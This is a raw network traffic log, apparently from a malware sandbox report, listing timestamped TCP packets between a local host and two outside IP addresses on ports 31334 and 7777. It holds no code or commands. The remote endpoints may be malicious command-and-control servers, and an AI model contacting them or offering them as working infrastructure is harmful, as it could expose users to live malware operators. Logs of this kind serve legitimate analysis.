                                                                                                                                  Jan 14, 2022 14:10:40.181210041 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.181354046 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.181579113 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.181723118 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.181924105 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.182152033 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.182272911 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.182447910 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.183068037 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.183178902 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.183406115 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.183552980 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.183741093 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.184272051 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:40.184386969 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:40.265309095 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.265383005 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.265431881 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.265479088 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.265723944 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.265882969 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.266128063 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.266248941 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.266774893 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.266822100 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.266962051 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.267160892 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.267437935 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.267486095 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.267669916 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.267877102 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.268052101 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.268248081 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.268384933 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.268600941 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.268760920 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.268961906 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.269108057 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.269360065 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.269541025 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.269676924 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.269906044 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.269983053 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:40.270077944 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:40.270104885 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.270236969 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.270387888 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.270591021 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.270736933 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.270926952 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.271125078 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.271284103 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.271492958 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.271645069 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.271866083 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.272016048 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.272209883 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.272826910 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.272981882 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.273035049 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.273250103 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.273298979 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.273509979 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.273705006 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.274130106 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:40.274219990 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:40.356075048 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.356123924 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.356151104 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.356296062 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.356493950 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.356652975 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.356826067 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.357016087 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.357213020 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.357388020 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.357697964 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.357728004 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.357933998 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.358094931 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.358275890 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.358524084 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.358654976 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.358855963 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.359057903 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.359186888 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.359370947 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.359575987 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.359775066 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.359935045 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.360210896 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.360296011 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.360457897 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.360800028 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:40.360869884 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.360910892 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.360918999 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:40.361028910 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.361236095 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.361358881 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.361562967 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.361722946 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.361952066 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.362137079 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.362256050 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.362457037 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.362740040 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.362867117 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.363004923 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.363176107 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.363374949 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.363538027 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.363711119 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.363913059 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.364140034 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.364420891 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.364461899 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.364896059 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:40.364974022 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:40.444633007 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.444694996 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.444735050 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.444860935 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.445095062 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.445251942 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.445410013 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.445532084 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.445749998 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.445934057 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.446094990 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.446288109 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.446476936 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.446657896 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.446854115 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.447161913 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.447200060 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.447361946 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.447575092 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.447741032 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.447880030 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.448092937 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.448287964 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.448468924 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.448651075 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.448851109 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.448909998 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:40.448982954 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.449179888 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.449419975 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.449539900 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.449702024 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.449930906 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.450098991 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.450259924 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.450443029 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.450612068 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.450792074 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.451175928 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.451374054 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.451581001 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.451695919 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.451894045 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.452097893 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.452253103 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.452459097 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.452655077 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.452815056 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.453013897 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.528633118 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.528661013 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.528753042 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.528851032 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.529210091 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.529242039 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.529411077 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.529618025 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.529759884 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.531047106 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.552578926 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:40.635011911 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.687278986 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:40.767535925 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:40.858659029 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.859450102 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:40.956840038 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.957667112 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:41.053113937 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.093553066 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:41.268122911 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.295778036 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.295876980 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.297173023 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.324593067 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.331589937 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.331670046 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.331722021 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.331727982 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.331773043 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.331823111 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.331830025 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.331873894 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.331913948 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.331916094 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.331963062 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.332006931 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.332012892 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.332557917 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.332617998 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.357294083 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.357362032 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.357412100 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.357413054 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.357464075 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.357502937 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.357512951 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.357566118 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.357605934 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.357614994 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.357665062 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.357707024 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.357714891 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.357764959 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.357805014 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.357812881 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.357892990 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.357934952 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.357942104 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.357991934 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.358031988 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.358040094 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.358088970 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.358127117 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.358136892 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.358186007 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.358225107 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.358234882 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.358283997 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.358323097 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.383658886 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.383738041 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.383790016 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.383795023 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.383846998 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.383887053 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.383892059 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.383943081 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.383982897 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.383992910 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.384043932 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.384080887 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.384092093 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.384141922 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.384177923 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.384191036 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.384239912 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.384278059 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.384289026 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.384337902 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.384373903 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.384386063 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.384435892 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.384471893 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.384495974 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.384552956 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.384589911 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.384603977 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.384654999 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.384691954 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.384706020 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.384757042 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.384800911 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.384809971 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.384860992 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.384896994 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.384912014 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.384962082 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.384998083 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.385014057 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.385066032 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.385102987 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.385117054 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.385168076 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.385206938 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.385220051 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.385271072 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.385308981 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.385323048 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.385373116 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.385410070 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.385423899 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.385474920 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.385512114 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.385526896 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.385577917 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.385615110 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.385629892 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.385977983 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.386024952 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.411480904 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.411550045 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.411602974 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.411608934 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.411655903 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.411696911 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.411708117 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.411761999 CET77774977845.82.70.152192.168.2.4
